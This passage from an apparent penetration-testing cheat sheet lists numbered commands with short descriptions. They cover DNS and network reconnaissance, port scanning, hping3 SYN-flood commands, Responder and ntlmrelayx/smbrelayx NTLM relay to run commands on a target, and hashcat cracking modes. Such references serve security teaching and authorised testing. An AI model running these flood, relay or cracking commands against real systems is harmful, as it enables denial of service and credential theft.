160 cewl http://192.168.1.1 -w wordlist.txt Generate a custom wordlist from a
website.
161 wfuzz -c -z file,/path/to/wordlist -u Fuzz URLs for hidden files and
http://192.168.1.1/FUZZ directories.
162 dnsenum example.com DNS enumeration tool for finding
subdomains.
163 dnsrecon -d example.com -t brt -D Brute-force DNS subdomains.
/path/to/wordlist.txt
164 dnsenum --enum example.com Comprehensive DNS enumeration.
165 dnsmap example.com DNS mapping and subdomain
discovery tool.
166 masscan -p1-65535 192.168.1.1 Fast port scanner for large
networks.
167 zmap -p 80 192.168.1.0/24 Fast network scanner focused on
speed.
168 recon-ng Web reconnaissance framework for
information gathering.
169 fping -a -g 192.168.1.0/24 Ping sweep to discover live hosts.
170 hping3 -1 192.168.1.1 Send ICMP echo request to test
connectivity.
171 hping3 -S 192.168.1.1 -p 80 Send TCP SYN packet to test if port
80 is open.
172 hping3 -A 192.168.1.1 -p 80 Send TCP ACK packet to test if port
80 is open.
By Mohammed AlSubayt
173 hping3 -2 192.168.1.1 -p 53 Send UDP packet to test if port 53 is
open.
174 hping3 -8 80 -c 1000 -S 192.168.1.1 Send 1000 SYN packets to port 80
to test for SYN flood.
175 hping3 -Q -p 80 -s 192.168.1.1 Sequence number analysis for TCP
ports.
176 fping -a -g 192.168.1.0/24 Ping sweep to discover live hosts.
177 hping3 --flood -V -p 80 192.168.1.1 Send continuous SYN packets to
flood a specific port.
178 masscan -p80,443 192.168.1.0/24 Fast port scanner for large
networks.
179 zmap -p 80 192.168.1.0/24 Fast network scanner focused on
speed.
180 whois example.com Retrieve domain registration
information.
181 dig example.com any Retrieve DNS records for a domain.
182 nslookup example.com Retrieve DNS records using
nslookup.
183 fierce -dns example.com DNS reconnaissance and
enumeration tool.
184 dmitry -winsepfb http://192.168.1.1 Deepmagic Information Gathering
Tool.
185 theHarvester -d example.com -l 500 -b google Gather emails, subdomains, and
other information from search
engines.
186 maltego Open-source intelligence and
forensics application.
187 spiderfoot Automate OSINT gathering and
analysis.
188 ike-scan 192.168.1.1 Scan and identify IKE VPN servers.
189 searchsploit Search for exploit code using
Exploit-DB.
190 searchsploit -m 12345 Mirror an exploit to the current
directory.
191 responder -I eth0 Network poisoning tool to capture
SMB/NTLM hashes.
192 ntlmrelayx.py -smb2support -i Relay captured NTLM hashes to
SMB service.
193 smbrelayx.py -h 192.168.1.1 -c "whoami" Relay NTLM hashes to execute
commands on the target.
194 responder -I eth0 -w Run Responder in full analysis
mode.
195 hashcat -a 0 -m 0 /path/to/hashfile High-performance password
/path/to/wordlist cracking.
196 hashcat -a 3 -m 0 /path/to/hashfile ?a?a?a?a?a?a Mask attack with brute-force for
passwords of length 6.
By Mohammed AlSubayt
197 hashcat -a 3 -m 1000 /path/to/hashfile ?l?l?l?l Mask attack with lowercase letters
for NTLM hashes.
198 hashcat -a 0 -m 1800 /path/to/hashfile Dictionary attack on SHA-512
/path/to/wordlist hashes.
199 hashcat -a 1 -m 0 /path/to/hashfile Combinator attack using two
/path/to/wordlist /path/to/rules wordlists.
200 hashcat -a 6 -m 0 /path/to/hashfile Hybrid attack with dictionary and
/path/to/wordlist ?d?d 2-digit suffix.

You might also like